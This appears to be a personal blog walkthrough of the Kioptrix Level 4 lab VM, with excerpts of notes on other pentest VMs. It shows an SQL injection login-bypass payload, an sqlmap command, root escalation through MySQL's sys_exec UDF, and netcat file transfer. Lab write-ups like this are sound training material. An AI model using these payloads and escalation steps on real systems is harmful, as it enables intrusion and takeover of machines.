Skip to main content

VMW- Kioptix level 1.4 UDF. Running o/s cmds from SQL

Walkthru @ 1. http://www.gcura.tech/kioptrix-level-1-3-4/


  1. Ports : 22,80,139 and 445

  • OpenSSH v4.7p1
  • Port 80 with Apache 2.2.8 / PHP/5.2.4 with Suhosin-Patch
  • Samba 3.0.28a
  • Linux 2.6.9 – 2.6.33

  1. URL appears to be SQL vulnerable to an SQL injection by putting a comma ' in the username and password fields
    1. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:
SELECT * FROM users where username='john' and password='1' or '1'='1'
  1. Also works if we use admin' or '1'='1 as password

  1. sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --dbs
From <http://www.gcura.tech/kioptrix-level-1-3-4/>
Didn’t work for me.





  1. ps -ef | grep root : to list all the processes.
Note the use of the -e option to display all processes, and -f to display the full format. Another useful option is -u, which allows you to filter the processes displayed by user ID. For example, to display all the processes owned by the user root, run a command like this:
$ ps -u root -o user,pid,cpu,cmd
USER       PID   CPU CMD
root         1   -   /usr/lib/systemd/systemd --switched-root --system --deserialize 24
root         2   -   [kthreadd]
root         4   -   [kworker/0:0H]
root         6   -   [mm_percpu_wq]
root         7   -   [ksoftirqd/0]

  1. I can see that MySQL is running with root privileges. Since I have ssh access to the machine lets see if I find the database credentials by accessing the configuration files.
What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions.  [Looked up these tutorials which helped me out with understanding MySQL UDF more. MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF] or [http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html]
$ whereis lib_mysqludf_sys.so
  1. mysql> select sys_exec('usermod -a -G admin john');
  2. Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.
  3. This pc has netcat if you need to copy linuxprivchecker file. I couldn’t wget it from Kali. It would connect to the server and not download it.
On the receiving end running, it will begin listening on port 1234.
>nc -l -p 1234 > out.file
On the sending end running,
>nc -w 3 [destination] 1234 < out.file

Comments

Popular posts from this blog

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...

VM: pWnOS 2.0

Walkthru A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around ] b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [metasploit using PHP Blog exploit] c. http://netsec.ws/?p=430 [burpsuite, sql porxy] d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [sql injection, union. Very good explanation of the process of what is being done. Didnt try cmds] e. https://www.youtube.com/watch?v=ytzZfI27ueU [sql injection, sqlmap read file and upload reverse shell using sqlmap] f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [sql injection, union using burp Very good . It list all email field that we are passing and modifying thru burp suite/proxy/intercept. One could enter those union statements in the email field but in this case, the field truncates and remove the later part of union statment which is why we...

38 VM : d0not5top: 1.2

https://www.vulnhub.com/?q=D0Not5top&sort=date-des&type=vm Walkthru: A. https://github.com/Hamza-Megahed/CTFs/blob/master/d0not5top/README [  burp proxy, adding hostnames to /etc/host shows following but not working for me. Not showing localhost stuff, $ dirb http://172.16.34.163/control/ -X .txt,.php,.html     + http://172.16.34.163/control/hosts.txt     127.0.0.1 localhost     127.0.0.1 D0Not5top.ctf     #127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05] B. https://adaywithtape.blogspot.com/2017/04/vulnhub-d0not5top-writeup.html [use nc cmd to get the flag and echo cmd to decode the flag, wfuzz, virtualhost, partially binary string, google language translate, curl  -header  host request, additional domains, OWSAP ZAP, exiftool, HD, hash64,] wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ Changing the syntax just a tad to only show html 200...